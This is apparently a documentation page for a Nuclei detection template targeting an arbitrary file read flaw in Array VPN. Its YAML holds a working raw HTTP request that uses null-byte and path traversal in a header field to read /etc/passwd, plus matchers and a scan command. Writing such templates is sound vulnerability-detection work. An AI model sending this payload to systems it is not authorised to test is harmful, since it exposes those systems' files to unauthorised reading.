Array VPN - Arbitrary File Reading Vulnerability
ID: array-vpn-lfi
Severity: high
Author: pussycat0x
Tags: lfi,vpn,arrayvpn
Description
Section titled “Description”Array VPN Arbitrary File Reading Vulnerability
YAML Source
Section titled “YAML Source”id: array-vpn-lfi
info: name: Array VPN - Arbitrary File Reading Vulnerability author: pussycat0x severity: high description: | Array VPN Arbitrary File Reading Vulnerability reference: - https://github.com/wy876/POC/blob/main/Array%20VPN%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md metadata: verified: true max-request: 1 fofa-query: product="Array-VPN" tags: lfi,vpn,arrayvpn
http: - raw: - | GET /prx/000/http/localhost/client_sec/%00../../../addfolder HTTP/1.1 Host: {{Hostname}} Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X_AN_FILESHARE: uname=t; password=t; sp_uname=t; flags=c3248;fshare_template=../../../../../../../../etc/passwd
matchers-condition: and matchers: - type: word part: body words: - "/prx/001/http/localh"
- type: regex regex: - "root:.*:0:0:"
- type: status status: - 401# digest: 4a0a004730450221009103fc7dd640fa4f44e5520e16501fa03b5a982b1e08c3f92508da3f2a3215c2022039c18d53192f39896fbab45eb45881087fa366cb5749a0444db1f34107662166:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/other/array-vpn-lfi.yaml"